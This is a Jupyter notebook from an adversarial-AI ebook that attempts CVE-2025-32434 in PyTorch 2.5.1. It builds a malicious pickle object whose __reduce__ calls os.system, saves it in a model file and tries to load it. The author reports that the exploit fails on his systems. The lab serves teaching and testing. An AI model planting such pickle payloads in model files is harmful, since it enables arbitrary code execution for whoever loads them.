<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(torch_load_CVE-2025-32434.ipynb)*** is part of the series of notebooks From ***A Little Book on Adversarial AI***  A free ebook released by Nik Alleyne

### Exploiting Torch Load Vulnerability: CVE-2025-32434

**Note** This vulnerability is real but it depends not only on your system running 2.5.1. For example, I was not able to exploit the vulnerability on my Surface but or on my laptop.  I think it ultimately has something to do with the system configuration. I did not look further into it.  

Feel free to learn more about exploiting the vulnerability from here: https://www.cve.news/cve-2025-32434/

In your Conda environment  

To ensure we setup specifically for this attack, let us create a conda environment  

$ **conda create --name=torch_load_2.5.1_vuln python=3.12 --yes**     

Activate the conda environment 
$ **conda activate torch_load_2.5.1_vuln**   


To ensure we can run our lab comfortable from Conda (Anaconda or MiniConda) let us install ipykernel     
$ pip install ipykernel --verbose --no-cache-dir   

Like we did in the envrionment_setup.ipynb site, select the Python kernel within VSCode. 

With that set, let us install the vulnerable version.  


In [3]:
# Install the vulnerable version
! pip install numpy==2.2.0 torch==2.5.1 --no-cache-dir --verbose   

Using pip 25.1 from /home/securitynik/miniconda3/envs/torch_load_2.5.1_vuln/lib/python3.12/site-packages/pip (python 3.12)
  Link requires a different Python (3.12.11 not in: '>=3.7,<3.11'): https://files.pythonhosted.org/packages/3a/be/650f9c091ef71cb01d735775d554e068752d3ff63d7943b26316dc401749/numpy-1.21.2.zip (from https://pypi.org/simple/numpy/) (requires-python:>=3.7,<3.11)
  Link requires a different Python (3.12.11 not in: '>=3.7,<3.11'): https://files.pythonhosted.org/packages/5f/d6/ad58ded26556eaeaa8c971e08b6466f17c4ac4d786cd3d800e26ce59cc01/numpy-1.21.3.zip (from https://pypi.org/simple/numpy/) (requires-python:>=3.7,<3.11)
  Link requires a different Python (3.12.11 not in: '>=3.7,<3.11'): https://files.pythonhosted.org/packages/fb/48/b0708ebd7718a8933f0d3937513ef8ef2f4f04529f1f66ca86d873043921/numpy-1.21.4.zip (from https://pypi.org/simple/numpy/) (requires-python:>=3.7,<3.11)
  Link requires a different Python (3.12.11 not in: '>=3.7,<3.11'): https://files.pythonhosted.or

In [4]:
# Let us import torch
import torch
import os

In [5]:
# Get the version of torch we are using
# print(torch.__version__)

if torch.__version__.__contains__('2.5.1'):
    print(f'[!] Torch {torch.__version__} is vulnerable to CVE-2025-32434')
else:
    print(f'[*] No vulnerable version of torch found! {torch.__version__}')

[!] Torch 2.5.1+cu124 is vulnerable to CVE-2025-32434


In [6]:
# Setup the device to work with
# This should ensure if there are accelerators in place, such as Apple backend or CUDA, 
# we should be able to take advantage of it.

if torch.cuda.is_available():
    print('Setting the device to cuda')
    device = 'cuda'
elif torch.backends.mps.is_available():
    print('Setting the device to Apple mps')
    device = 'mps'
else:
    print('Setting the device to CPU')
    device = torch.device('cpu')

Setting the device to cuda


In [7]:
# Create a malicious model 
# This should/will look similar to the issue we deal with in the fickling section

class MaliciousModel(object):
    def __reduce__(self):
        print(f'.__reduce__ triggered ')
        return (os.system, ('echo YOU HAVE BEEN PAWNED! > /tmp/pwnd.txt', ))

In [8]:
# Create a malicious tensor
malicious_tensor = torch.tensor(data=[9., 8., 7.])
malicious_tensor

tensor([9., 8., 7.])

In [9]:
# Let us write our model to file
with open(file=r'/tmp/malicious_model.pt', mode='wb') as f:
    torch.save(obj={'weights': malicious_tensor, 'exploit' : MaliciousModel()}, f=f )

.__reduce__ triggered 


In [10]:
# Verify the file has been created
!ls /tmp/malicious_model.pt

/tmp/malicious_model.pt


In [11]:
# With the model created, let us trigger the vulnerability 
print(f'Loading model ...')
model = torch.load(f='/tmp/malicious_model.pt', weights_only=True)
model

Loading model ...


UnpicklingError: Weights only load failed. Re-running `torch.load` with `weights_only` set to `False` will likely succeed, but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.
Trying to load unsupported GLOBAL posix.system whose module posix is blocked.

Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html.

In my case above it fails. If I set *weights_only=False* it works. However that is not what we want here. Maybe it is something with my system build. However, you can look further into it.  

Realistically, I could have left this lab out. However, I don't wish for you to think all vulnerabilities are easily exploitable. Sometimes when they say a fix exists it does not as we will see in the TFServing lab. Similarly, for whatever strange reason, on this system, I am unable to exploit this vulnerability. 

In [ ]:
# Was the file created
# In our case it did not because their was an error.  
!ls /tmp/pwnd.txt

ls: cannot access '/tmp/pwnd.txt': No such file or directory


If everything works out, you should see the file created above.  

Reference:  
https://www.cve.news/cve-2025-32434/  